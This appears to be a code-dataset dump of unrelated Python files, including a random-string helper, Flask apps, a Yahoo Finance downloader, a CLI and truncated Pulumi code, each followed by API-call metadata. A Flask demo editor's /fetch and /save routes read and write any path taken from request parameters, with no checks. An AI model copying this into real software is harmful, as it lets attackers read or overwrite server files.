'(edge_numbers)\n', (6497, 6511), True, 'import numpy as np\n'), ((715, 771), 'power_planner.utils.utils_ksp.KspUtils.path_distance', 'KspUtils.path_distance', (['path', 'comp_path'], {'mode': '"""eucl_max"""'}), "(path, comp_path, mode='eucl_max')\n", (737, 771), False, 'from power_planner.utils.utils_ksp import KspUtils\n'), ((845, 902), 'power_planner.utils.utils_ksp.KspUtils.path_distance', 'KspUtils.path_distance', (['path', 'comp_path'], {'mode': '"""eucl_mean"""'}), "(path, comp_path, mode='eucl_mean')\n", (867, 902), False, 'from power_planner.utils.utils_ksp import KspUtils\n'), ((4338, 4370), 'numpy.ones', 'np.ones', (['belgium_inst_corr.shape'], {}), '(belgium_inst_corr.shape)\n', (4345, 4370), True, 'import numpy as np\n'), ((5203, 5299), 'power_planner.utils.utils.get_distance_surface', 'get_distance_surface', (['graph.hard_constraints.shape', '[path_gt]'], {'mode': '"""dilation"""', 'n_dilate': '(10)'}), "(graph.hard_constraints.shape, [path_gt], mode=\n 'dilation', n_dilate=10)\n", (5223, 5299), False, 'from power_planner.utils.utils import get_distance_surface\n'), ((6399, 6410), 'time.time', 'time.time', ([], {}), '()\n', (6408, 6410), False, 'import time\n'), ((5973, 5990), 'numpy.ceil', 'np.ceil', (['now_dist'], {}), '(now_dist)\n', (5980, 5990), True, 'import numpy as np\n'), ((6301, 6318), 'numpy.ceil', 'np.ceil', (['now_dist'], {}), '(now_dist)\n', (6308, 6318), True, 'import numpy as np\n'), ((5551, 5573), 'numpy.where', 'np.where', (['(corridor > 0)'], {}), '(corridor > 0)\n', (5559, 5573), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
pip_services3_commons.random.RandomString
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RandomString implementation
:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
from typing import List
import random
from .RandomBoolean import RandomBoolean
from .RandomInteger import RandomInteger
_digits = "01234956789"
_symbols = "_,.:-/.[].{},#-!,$=%.+^.&*-() "
_alpha_lower = "abcdefghijklmnopqrstuvwxyz"
_alpha_upper = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
_alpha = _alpha_upper + _alpha_lower
_chars = _alpha + _digits + _symbols
class RandomString(object):
"""
Random generator for string values.
Example:
.. code-block:: python
value1 = RandomString.pickChar("ABC") # Possible result: "C"
value2 = RandomString.pick(["A","B","C"]) # Possible result: "gBW"
"""
@staticmethod
def pick(values: List[str]) -> str:
"""
Picks a random string from an array of string.
:param values: a string to pick from
:return: a randomly picked string.
"""
if values is None or len(values) == 0:
return ''
return random.choice(values)
@staticmethod
def pick_char(values: str) -> str:
"""
Picks a random character from a string.
:param values: a string to pick a char from
:return: a randomly picked char.
"""
if values is None or len(values) == 0:
return ''
index = RandomInteger.next_integer(len(values))
return values[index]
@staticmethod
def distort(value: str) -> str:
"""
Distorts a string by randomly replacing characters in it.
:param value: a string to distort.
:return: a distored string.
"""
value = value.lower()
if RandomBoolean.chance(1, 5):
value = value[0:1].upper() + value[1:]
if RandomBoolean.chance(1, 3):
value = value + random.choice(_symbols)
return value
@staticmethod
def next_alpha_char() -> str:
"""
Generates random alpha characted [A-Za-z]
:return: a random characted.
"""
return random.choice(_alpha)
@staticmethod
def next_string(min_size: int, max_size: int) -> str:
"""
Generates a random string, consisting of upper and lower case letters (of the English alphabet),
digits (0-9), and symbols ("_,.:-/.[].{},#-!,$=%.+^.&*-() ").
:param min_size: (optional) minimum string length.
:param max_size: maximum string length.
:return: a random string.
"""
result = ''
max_size = max_size if max_size != None else min_size
length = RandomInteger.next_integer(min_size, max_size)
for i in range(length):
result += random.choice(_chars)
return result
|
[
"random.choice"
] |
[((1250, 1271), 'random.choice', 'random.choice', (['values'], {}), '(values)\n', (1263, 1271), False, 'import random\n'), ((2291, 2312), 'random.choice', 'random.choice', (['_alpha'], {}), '(_alpha)\n', (2304, 2312), False, 'import random\n'), ((2934, 2955), 'random.choice', 'random.choice', (['_chars'], {}), '(_chars)\n', (2947, 2955), False, 'import random\n'), ((2066, 2089), 'random.choice', 'random.choice', (['_symbols'], {}), '(_symbols)\n', (2079, 2089), False, 'import random\n')]
|
import os
from flask import Flask
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
from models.tree import configure as config_db_tree
from models.specie import configure as config_db_specie
from models.group import configure as config_db_group
from models.harvest import configure as config_db_harvest
def create_app():
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///sq.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['JWT_SECRET_KEY'] = os.environ.get('SECRET_KEY')
from routes import bp_trees
app.register_blueprint(bp_trees)
config_db_tree(app)
# config_db_specie(app)
# config_db_group(app)
# config_db_harvest(app)
Migrate(app, app.db)
return app
|
[
"os.environ.get",
"flask.Flask",
"flask_migrate.Migrate",
"models.tree.configure"
] |
[((369, 384), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (374, 384), False, 'from flask import Flask\n'), ((542, 570), 'os.environ.get', 'os.environ.get', (['"""SECRET_KEY"""'], {}), "('SECRET_KEY')\n", (556, 570), False, 'import os\n'), ((651, 670), 'models.tree.configure', 'config_db_tree', (['app'], {}), '(app)\n', (665, 670), True, 'from models.tree import configure as config_db_tree\n'), ((763, 783), 'flask_migrate.Migrate', 'Migrate', (['app', 'app.db'], {}), '(app, app.db)\n', (770, 783), False, 'from flask_migrate import Migrate\n')]
|
from flask import Blueprint
from flask import render_template, jsonify, request, redirect, url_for
mod = Blueprint('demo1', __name__, )
@mod.route('/', methods=["GET", "POST"])
def index():
return redirect(url_for('demo1.editor'))
@mod.route('/editor', methods=["GET", "POST"])
def editor():
return render_template('demo1.html')
@mod.route('/fetch', methods=["GET", "POST"])
def fetch_file():
filepath = request.args.get('path')
if not filepath:
return "No path passed", 403
try:
content = open(filepath, "rb").read()
except:
return "Error reading file", 403
return jsonify(content=content)
@mod.route('/save', methods=["GET", "POST"])
def save_file():
filepath = request.args.get('path')
content = request.args.get('content')
if not filepath:
return "No path passed", 403
if not content:
return "No content passed", 403
try:
with open(filepath, "wb") as f:
f.write(content)
message = "File saved successfully"
except:
return "Error writing file", 403
return jsonify(content=message)
|
[
"flask.Blueprint",
"flask.request.args.get",
"flask.jsonify",
"flask.url_for",
"flask.render_template"
] |
[((106, 134), 'flask.Blueprint', 'Blueprint', (['"""demo1"""', '__name__'], {}), "('demo1', __name__)\n", (115, 134), False, 'from flask import Blueprint\n'), ((312, 341), 'flask.render_template', 'render_template', (['"""demo1.html"""'], {}), "('demo1.html')\n", (327, 341), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((423, 447), 'flask.request.args.get', 'request.args.get', (['"""path"""'], {}), "('path')\n", (439, 447), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((626, 650), 'flask.jsonify', 'jsonify', ([], {'content': 'content'}), '(content=content)\n', (633, 650), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((730, 754), 'flask.request.args.get', 'request.args.get', (['"""path"""'], {}), "('path')\n", (746, 754), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((769, 796), 'flask.request.args.get', 'request.args.get', (['"""content"""'], {}), "('content')\n", (785, 796), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((1109, 1133), 'flask.jsonify', 'jsonify', ([], {'content': 'message'}), '(content=message)\n', (1116, 1133), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((213, 236), 'flask.url_for', 'url_for', (['"""demo1.editor"""'], {}), "('demo1.editor')\n", (220, 236), False, 'from flask import render_template, jsonify, request, redirect, url_for\n')]
|
#!/usr/bin/env python
import logging
import aiohttp
import asyncio
from tqdm.asyncio import tqdm_asyncio
from tqdm.contrib.logging import logging_redirect_tqdm
import pandas as pd
import numpy as np
import time
import datetime as dt
from typing import Collection, Dict, List, Optional, Tuple, Union
from yahoo_finance import _download_single_ticker_chart_data, download_ticker_sector_industry
logger = logging.getLogger(__name__)
HEADERS = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
}
async def download_tickers_sector_industry(tickers: List[str]) -> pd.DataFrame:
async with aiohttp.ClientSession(headers=HEADERS) as session:
print("\nDownloading stock industry and sector")
with logging_redirect_tqdm():
tickers_info = await tqdm_asyncio.gather(
*[download_ticker_sector_industry(session, ticker) for ticker in tickers]
)
if None in tickers_info:
errored_tickers = [ticker for ticker, ticker_info in zip(tickers, tickers_info) if ticker_info is None]
tickers_info = [ticker_info for ticker_info in tickers_info if ticker_info is not None]
print(f"Out of {len(tickers)} tickers missing info, we could get {len(tickers_info)}")
print(f"Couldn't get info for the following {len(errored_tickers)}: {', '.join(errored_tickers)}")
return pd.DataFrame(tickers_info, columns=["SYMBOL", "SECTOR", "INDUSTRY"])
async def download_tickers_quotes(
tickers: List[str], start_date: int, end_date: int, interval: str
) -> Tuple[pd.DataFrame, Dict]:
"""Download quotes and their currencies for all the specified tickers in the specified time window.
Parameters
----------
tickers : List[str]
The list of tickers to download data for
start_date : int
The start date in POSIX format.
end_date : int
The end date in POSIX format.
interval : str
The interval between each data point (e.g. "1d")
Returns
-------
Tuple[List[Dict], Dict]
A tuple containg two dicts, first the quotes, second their currencies.
"""
async with aiohttp.ClientSession(headers=HEADERS) as session:
print("\nDownloading stock quotes")
with logging_redirect_tqdm():
tickers_chart_data = await tqdm_asyncio.gather(
*[
_download_single_ticker_chart_data(session, ticker, start_date, end_date, interval)
for ticker in tickers
]
)
if None in tickers_chart_data:
errored_tickers = [ticker for ticker, ticker_info in zip(tickers, tickers_chart_data) if ticker_info is None]
tickers_chart_data = [t for t in tickers_chart_data if t is not None]
print(f"Out of {len(tickers)} tickers, we could get quotes for {len(tickers_chart_data)}")
print(f"Couldn't get quotes for: {', '.join(errored_tickers)}")
quotes = {ticker_dict["ticker"]: ticker_dict["quotes"] for ticker_dict in tickers_chart_data}
currencies = {ticker_dict["ticker"]: ticker_dict["currency"] for ticker_dict in tickers_chart_data}
return pd.concat(quotes, axis="columns", sort=True), currencies
def extract_ticker_list(tickers: Union[Collection[str], str]) -> List[str]:
if isinstance(tickers, (list, set, tuple)):
pass
elif isinstance(tickers, str):
# Replacing commas by spaces helps removing excess spaces between commas if any
tickers = tickers.replace(",", " ").split()
else:
raise ValueError("tickers must be a str consisting of a comma separated list of tickers or a list of tickers")
return list(set([ticker.upper() for ticker in tickers]))
def parse_start_end_date(
start_date: Optional[str] = None, end_date: Optional[str] = None, default_start_days_ago=365
) -> Tuple[int, int]:
end_date = int(time.time()) if end_date is None else int(dt.datetime.strptime(end_date, "%Y-%m-%d").timestamp())
start_date = (
int((dt.datetime.today() - dt.timedelta(365)).timestamp())
if start_date is None
else int(dt.datetime.strptime(start_date, "%Y-%m-%d").timestamp())
)
return start_date, end_date
def download_tickers_info(
tickers: list, start_date: Optional[str] = None, end_date: Optional[str] = None, interval: str = "1d"
) -> dict:
"""
Download historical data for tickers in the list.
Parameters
----------
tickers: list
Tickers for which to download historical information.
start: str or int
Start download data from this date.
end: str or int
End download data at this date.
interval: str
Frequency between data.
Returns
-------
data: dict
Dictionary including the following keys:
- tickers: list of tickers
- logp: array of log-adjusted closing prices, shape=(num stocks, length period);
- volume: array of volumes, shape=(num stocks, length period);
- sectors: dictionary of stock sector for each ticker;
- industries: dictionary of stock industry for each ticker.
"""
logger.info(f"Downloading data for {len(tickers)} tickers")
tickers = extract_ticker_list(tickers)
stock_info_filename = "stock_info.csv"
try:
stock_info_df = pd.read_csv(stock_info_filename)
logger.info(f"Reading stock info found in file '{stock_info_filename}'")
except FileNotFoundError:
# Creating an empty dataframe
stock_info_columns = ["SYMBOL", "CURRENCY", "SECTOR", "INDUSTRY"]
stock_info_df = pd.DataFrame(columns=stock_info_columns)
# Downloading stock quotes and currencies
start_date, end_date = parse_start_end_date(start_date, end_date)
stocks_quotes_df, currencies = asyncio.run(download_tickers_quotes(tickers, start_date, end_date, interval))
# Remove tickers with excess null values
stocks_quotes_df = stocks_quotes_df.loc[:, (stocks_quotes_df.isnull().mean() < 0.33)]
assert stocks_quotes_df.shape[0] > 0, Exception("No symbol with full information is available.")
# Fill in null values
stocks_quotes_df = stocks_quotes_df.fillna(method="bfill").fillna(method="ffill").drop_duplicates()
final_list_tickers = stocks_quotes_df.columns.get_level_values(0).unique()
failed_to_get_tickers_quotes = [ticker for ticker in tickers if ticker not in final_list_tickers]
if len(failed_to_get_tickers_quotes) > 0:
print(
f"\nRemoving {failed_to_get_tickers_quotes} from list of symbols because we could not collect complete quotes."
)
# Downloading missing stocks info
tickers_already_fetched_info = stock_info_df["SYMBOL"].values
tickers_missing_info = [ticker for ticker in tickers if ticker not in tickers_already_fetched_info]
if len(tickers_missing_info) > 0:
missing_tickers_info_df = asyncio.run(download_tickers_sector_industry(tickers_missing_info))
missing_tickers_info_df["CURRENCY"] = missing_tickers_info_df["SYMBOL"].apply(currencies.get)
stock_info_df = pd.concat([stock_info_df, missing_tickers_info_df])
stock_info_df.to_csv(stock_info_filename, index=False)
# Taking the quote currency as the one that appears the most in the data
default_currency = stock_info_df["CURRENCY"].mode()[0]
# Downloading the exchange rate between the default currency and all the others in the data
currencies = stock_info_df["CURRENCY"].to_list()
exchange_rates = get_exchange_rates(
from_currencies=stock_info_df["CURRENCY"].dropna().to_list(),
to_currency=default_currency,
dates_index=stocks_quotes_df.index,
start_date=start_date,
end_date=end_date,
interval=interval,
)
return dict(
tickers=final_list_tickers,
dates=pd.to_datetime(stocks_quotes_df.index),
price=stocks_quotes_df.xs("Adj Close", level=1, axis="columns").to_numpy().T,
volume=stocks_quotes_df.xs("Volume", level=1, axis="columns").to_numpy().T,
currencies=currencies,
exchange_rates=exchange_rates,
default_currency=default_currency,
sectors={ticker: sector for ticker, sector in zip(stock_info_df["SYMBOL"], stock_info_df["SECTOR"])},
industries={ticker: industry for ticker, industry in zip(stock_info_df["SYMBOL"], stock_info_df["INDUSTRY"])},
)
def get_exchange_rates(
from_currencies: list,
to_currency: str,
dates_index: pd.DatetimeIndex,
start_date: int,
end_date: int,
interval: str = "1d",
) -> dict:
"""
It finds the most common currency and set it as default one. For any other currency, it downloads exchange rate
closing prices to the default currency and return them as data frame.
Parameters
----------
from_currencies: list
A list of currencies to convert.
to_currency: str
Currency to convert to.
dates: date
Dates for which exchange rates should be available.
start: str or int
Start download data from this timestamp date.
end: str or int
End download data at this timestamp date.
interval: str
Frequency between data.
Returns
-------
xrates: dict
A dictionary with currencies as keys and list of exchange rates at desired dates as values.
"""
from_currencies = [currency for currency in np.unique(from_currencies) if currency != to_currency]
if len(from_currencies) == 0:
return {}
xrates = asyncio.run(async_get_exchange_rates(from_currencies, to_currency, start_date, end_date, interval))
xrates.reindex = dates_index
xrates = xrates.fillna(method="bfill").fillna(method="ffill")
return xrates.to_dict(orient="list")
async def async_get_exchange_rates(
from_currencies: list,
to_currency: str,
start_date: int,
end_date: int,
interval: str,
):
async with aiohttp.ClientSession(headers=HEADERS) as session:
currencies_chart_data = await asyncio.gather(
*[
_download_single_ticker_chart_data(
session, from_currency + to_currency + "=x", start_date, end_date, interval
)
for from_currency in from_currencies
]
)
quotes = [chart_data["quotes"]["Adj Close"] for chart_data in currencies_chart_data]
return pd.concat(quotes, keys=from_currencies, axis="columns", sort=True)
|
[
"pandas.DataFrame",
"datetime.datetime.today",
"pandas.read_csv",
"numpy.unique",
"tqdm.contrib.logging.logging_redirect_tqdm",
"time.time",
"aiohttp.ClientSession",
"datetime.datetime.strptime",
"pandas.to_datetime",
"datetime.timedelta",
"yahoo_finance.download_ticker_sector_industry",
"yahoo_finance._download_single_ticker_chart_data",
"pandas.concat",
"logging.getLogger"
] |
[((404, 431), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (421, 431), False, 'import logging\n'), ((1442, 1510), 'pandas.DataFrame', 'pd.DataFrame', (['tickers_info'], {'columns': "['SYMBOL', 'SECTOR', 'INDUSTRY']"}), "(tickers_info, columns=['SYMBOL', 'SECTOR', 'INDUSTRY'])\n", (1454, 1510), True, 'import pandas as pd\n'), ((10455, 10521), 'pandas.concat', 'pd.concat', (['quotes'], {'keys': 'from_currencies', 'axis': '"""columns"""', 'sort': '(True)'}), "(quotes, keys=from_currencies, axis='columns', sort=True)\n", (10464, 10521), True, 'import pandas as pd\n'), ((686, 724), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {'headers': 'HEADERS'}), '(headers=HEADERS)\n', (707, 724), False, 'import aiohttp\n'), ((2207, 2245), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {'headers': 'HEADERS'}), '(headers=HEADERS)\n', (2228, 2245), False, 'import aiohttp\n'), ((3215, 3259), 'pandas.concat', 'pd.concat', (['quotes'], {'axis': '"""columns"""', 'sort': '(True)'}), "(quotes, axis='columns', sort=True)\n", (3224, 3259), True, 'import pandas as pd\n'), ((5375, 5407), 'pandas.read_csv', 'pd.read_csv', (['stock_info_filename'], {}), '(stock_info_filename)\n', (5386, 5407), True, 'import pandas as pd\n'), ((7146, 7197), 'pandas.concat', 'pd.concat', (['[stock_info_df, missing_tickers_info_df]'], {}), '([stock_info_df, missing_tickers_info_df])\n', (7155, 7197), True, 'import pandas as pd\n'), ((9991, 10029), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {'headers': 'HEADERS'}), '(headers=HEADERS)\n', (10012, 10029), False, 'import aiohttp\n'), ((807, 830), 'tqdm.contrib.logging.logging_redirect_tqdm', 'logging_redirect_tqdm', ([], {}), '()\n', (828, 830), False, 'from tqdm.contrib.logging import logging_redirect_tqdm\n'), ((2315, 2338), 'tqdm.contrib.logging.logging_redirect_tqdm', 'logging_redirect_tqdm', ([], {}), '()\n', (2336, 2338), False, 'from tqdm.contrib.logging import logging_redirect_tqdm\n'), ((3943, 3954), 'time.time', 'time.time', ([], {}), '()\n', (3952, 3954), False, 'import time\n'), ((5655, 5695), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'stock_info_columns'}), '(columns=stock_info_columns)\n', (5667, 5695), True, 'import pandas as pd\n'), ((7899, 7937), 'pandas.to_datetime', 'pd.to_datetime', (['stocks_quotes_df.index'], {}), '(stocks_quotes_df.index)\n', (7913, 7937), True, 'import pandas as pd\n'), ((9464, 9490), 'numpy.unique', 'np.unique', (['from_currencies'], {}), '(from_currencies)\n', (9473, 9490), True, 'import numpy as np\n'), ((3985, 4027), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['end_date', '"""%Y-%m-%d"""'], {}), "(end_date, '%Y-%m-%d')\n", (4005, 4027), True, 'import datetime as dt\n'), ((4174, 4218), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['start_date', '"""%Y-%m-%d"""'], {}), "(start_date, '%Y-%m-%d')\n", (4194, 4218), True, 'import datetime as dt\n'), ((4073, 4092), 'datetime.datetime.today', 'dt.datetime.today', ([], {}), '()\n', (4090, 4092), True, 'import datetime as dt\n'), ((4095, 4112), 'datetime.timedelta', 'dt.timedelta', (['(365)'], {}), '(365)\n', (4107, 4112), True, 'import datetime as dt\n'), ((10127, 10242), 'yahoo_finance._download_single_ticker_chart_data', '_download_single_ticker_chart_data', (['session', "(from_currency + to_currency + '=x')", 'start_date', 'end_date', 'interval'], {}), "(session, from_currency + to_currency +\n '=x', start_date, end_date, interval)\n", (10161, 10242), False, 'from yahoo_finance import _download_single_ticker_chart_data, download_ticker_sector_industry\n'), ((904, 952), 'yahoo_finance.download_ticker_sector_industry', 'download_ticker_sector_industry', (['session', 'ticker'], {}), '(session, ticker)\n', (935, 952), False, 'from yahoo_finance import _download_single_ticker_chart_data, download_ticker_sector_industry\n'), ((2439, 2526), 'yahoo_finance._download_single_ticker_chart_data', '_download_single_ticker_chart_data', (['session', 'ticker', 'start_date', 'end_date', 'interval'], {}), '(session, ticker, start_date, end_date,\n interval)\n', (2473, 2526), False, 'from yahoo_finance import _download_single_ticker_chart_data, download_ticker_sector_industry\n')]
|
import argparse
import pickle
from . import executor
from .db import create_indices
from .protocol import Protocol
class ParseKwargs(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, {})
for value in values:
key, value = value.split("=")
getattr(namespace, self.dest)[key] = value
parser = argparse.ArgumentParser(
prog="backd", description="Command-line interface for backd.fund"
)
def add_protocol_choice(subparser):
subparser.add_argument(
"-p",
"--protocol",
default="compound",
help="protocol to use",
choices=Protocol.registered(),
)
subparsers = parser.add_subparsers(dest="command")
subparsers.add_parser("create-indices")
process_all_events_parser = subparsers.add_parser("process-all-events")
add_protocol_choice(process_all_events_parser)
process_all_events_parser.add_argument(
"--max-block", type=int, help="block up to which the simulation should run"
)
process_all_events_parser.add_argument("--hooks", nargs="+", help="hooks to execute")
process_all_events_parser.add_argument(
"-o", "--output", required=True, help="output pickle file"
)
def add_state_arg(subparser):
subparser.add_argument("-s", "--state", required=True, help="state pickle file")
def add_output_arg(subparser, required=False):
subparser.add_argument("-o", "--output", required=required, help="output file")
plot_parser = subparsers.add_parser("plot")
add_protocol_choice(plot_parser)
plot_subparsers = plot_parser.add_subparsers(dest="subcommand")
plot_supbow_num_time_parser = plot_subparsers.add_parser(
"suppliers-borrowers-over-time",
help="plots suppliers and borrowers over time",
)
add_state_arg(plot_supbow_num_time_parser)
add_output_arg(plot_supbow_num_time_parser)
plot_supbow_num_time_parser.add_argument(
"-i", "--interval", default=100, type=int, help="interval between blocks"
)
plot_supbow_time_parser = plot_subparsers.add_parser(
"supply-borrow-over-time",
help="plots supply and borrows over time",
)
add_state_arg(plot_supbow_time_parser)
add_output_arg(plot_supbow_time_parser)
plot_supbow_time_parser.add_argument(
"--resample", default="1d", help="period to use for resampling"
)
plot_liquidable_over_time_parser = plot_subparsers.add_parser(
"liquidable-over-time", help="plots liquidable positions over time"
)
add_output_arg(plot_liquidable_over_time_parser)
plot_liquidable_over_time_parser.add_argument("files", nargs="+", help="files to plot")
plot_liquidable_over_time_parser.add_argument(
"-s", "--styles", nargs="*", help="plot styles", default=["o", "x", "v", "^"]
)
plot_liquidable_over_time_parser.add_argument(
"-l", "--labels", nargs="*", help="plot labels"
)
plot_liquidable_over_time_parser.add_argument(
"--resample", default="1d", help="period to use for resampling"
)
plot_supbow_ratios_time_parser = plot_subparsers.add_parser(
"supply-borrow-ratios-over-time",
help="plots supply and borrow ratios over time",
)
add_state_arg(plot_supbow_ratios_time_parser)
add_output_arg(plot_supbow_ratios_time_parser)
plot_supbow_ratios_time_parser.add_argument(
"-t",
"--thresholds",
nargs="*",
default=[1.0, 1.05, 1.1, 1.25, 1.5, 2.0],
type=float,
help="thresholds to use for plotting",
)
plot_liquidations_time_parser = plot_subparsers.add_parser(
"liquidations-over-time",
help="plots liquidations over time",
)
add_state_arg(plot_liquidations_time_parser)
add_output_arg(plot_liquidations_time_parser)
plot_supply_borrow_distribution_parser = plot_subparsers.add_parser(
"supply-borrow-distribution",
help="plots supply/borrow distribution",
)
add_state_arg(plot_supply_borrow_distribution_parser)
add_output_arg(plot_supply_borrow_distribution_parser)
plot_supply_borrow_distribution_parser.add_argument(
"-p",
"--property",
default="supply",
help="property to plot",
choices=["supply", "borrow"],
)
plot_supply_borrow_distribution_parser.add_argument(
"-t",
"--threshold",
type=int,
default=100,
help="minimum amount of USD to be considered",
)
plot_supply_borrow_distribution_parser.add_argument(
"-b", "--bucket-size", type=int, default=10, help="number of users per bucket"
)
plot_supply_borrow_distribution_parser.add_argument(
"-i", "--interval", default=50, type=int, help="interval between ticks"
)
plot_time_to_liquidation_parser = plot_subparsers.add_parser(
"time-to-liquidation",
help="plots time to liquidation",
)
add_state_arg(plot_time_to_liquidation_parser)
add_output_arg(plot_time_to_liquidation_parser)
plot_supply_borrow_distribution_parser.add_argument(
"-m", "--max-blocks", default=17, type=int, help="maximum number of blocks to plot"
)
plot_top_suppliers_and_borrowers_parser = plot_subparsers.add_parser(
"top-suppliers-and-borrowers",
help="creates table with top suppliers and borrowers",
)
add_state_arg(plot_top_suppliers_and_borrowers_parser)
plot_top_suppliers_and_borrowers_parser.add_argument(
"-n",
"--top-n",
help="Number of suppliers and borrowers to plot",
type=int,
default=10,
)
export_parser = subparsers.add_parser("export")
add_protocol_choice(export_parser)
export_subparsers = export_parser.add_subparsers(dest="subcommand")
export_borsup_time_parser = export_subparsers.add_parser("borrow-supply-over-time")
export_borsup_time_parser.add_argument(
"-s", "--state", required=True, help="state pickle file"
)
add_output_arg(export_borsup_time_parser, required=True)
export_borsup_time_parser.add_argument("-t", "--threshold", default=10_000, type=int)
def run_create_indices(_args):
create_indices()
def run_process_all_events(args):
state = executor.process_all_events(
args["protocol"], hooks=args["hooks"], max_block=args["max_block"]
)
with open(args["output"], "wb") as f:
pickle.dump(state, f)
def run_plot(args):
protocol = Protocol.get(args["protocol"])()
plots = protocol.get_plots()
if not args["subcommand"]:
plot_parser.error("no subcommand provided")
func_name = "plot_{0}".format(args["subcommand"].replace("-", "_"))
func = getattr(plots, func_name, None)
if not func:
plot_parser.error(
"unknown plot {0} for protocol {1}".format(args["type"], args["protocol"])
)
func(args)
def run_export(args):
protocol: Protocol = Protocol.get(args["protocol"])()
exporter = protocol.get_exporter()
if not args["subcommand"]:
export_parser.error("no subcommand provided")
func_name = "export_{0}".format(args["subcommand"].replace("-", "_"))
func = getattr(exporter, func_name)
func(args)
def run():
args = parser.parse_args()
if not args.command:
parser.error("no command given")
func = globals()["run_" + args.command.replace("-", "_")]
func(vars(args))
|
[
"pickle.dump",
"argparse.ArgumentParser"
] |
[((404, 499), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""backd"""', 'description': '"""Command-line interface for backd.fund"""'}), "(prog='backd', description=\n 'Command-line interface for backd.fund')\n", (427, 499), False, 'import argparse\n'), ((5966, 5987), 'pickle.dump', 'pickle.dump', (['state', 'f'], {}), '(state, f)\n', (5977, 5987), False, 'import pickle\n')]
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetWebTestResult',
'AwaitableGetWebTestResult',
'get_web_test',
]
@pulumi.output_type
class GetWebTestResult:
"""
An Application Insights WebTest definition.
"""
def __init__(__self__, configuration=None, description=None, enabled=None, frequency=None, id=None, kind=None, location=None, locations=None, name=None, provisioning_state=None, request=None, retry_enabled=None, synthetic_monitor_id=None, tags=None, timeout=None, type=None, validation_rules=None, web_test_kind=None, web_test_name=None):
if configuration and not isinstance(configuration, dict):
raise TypeError("Expected argument 'configuration' to be a dict")
pulumi.set(__self__, "configuration", configuration)
if description and not isinstance(description, str):
raise TypeError("Expected argument 'description' to be a str")
pulumi.set(__self__, "description", description)
if enabled and not isinstance(enabled, bool):
raise TypeError("Expected argument 'enabled' to be a bool")
pulumi.set(__self__, "enabled", enabled)
if frequency and not isinstance(frequency, int):
raise TypeError("Expected argument 'frequency' to be a int")
pulumi.set(__self__, "frequency", frequency)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if locations and not isinstance(locations, list):
raise TypeError("Expected argument 'locations' to be a list")
pulumi.set(__self__, "locations", locations)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if request and not isinstance(request, dict):
raise TypeError("Expected argument 'request' to be a dict")
pulumi.set(__self__, "request", request)
if retry_enabled and not isinstance(retry_enabled, bool):
raise TypeError("Expected argument 'retry_enabled' to be a bool")
pulumi.set(__self__, "retry_enabled", retry_enabled)
if synthetic_monitor_id and not isinstance(synthetic_monitor_id, str):
raise TypeError("Expected argument 'synthetic_monitor_id' to be a str")
pulumi.set(__self__, "synthetic_monitor_id", synthetic_monitor_id)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if timeout and not isinstance(timeout, int):
raise TypeError("Expected argument 'timeout' to be a int")
pulumi.set(__self__, "timeout", timeout)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if validation_rules and not isinstance(validation_rules, dict):
raise TypeError("Expected argument 'validation_rules' to be a dict")
pulumi.set(__self__, "validation_rules", validation_rules)
if web_test_kind and not isinstance(web_test_kind, str):
raise TypeError("Expected argument 'web_test_kind' to be a str")
pulumi.set(__self__, "web_test_kind", web_test_kind)
if web_test_name and not isinstance(web_test_name, str):
raise TypeError("Expected argument 'web_test_name' to be a str")
pulumi.set(__self__, "web_test_name", web_test_name)
@property
@pulumi.getter
def configuration(self) -> Optional['outputs.WebTestPropertiesResponseConfiguration']:
"""
An XML configuration specification for a WebTest.
"""
return pulumi.get(self, "configuration")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
User defined description for this WebTest.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
Is the test actively being monitored.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def frequency(self) -> Optional[int]:
"""
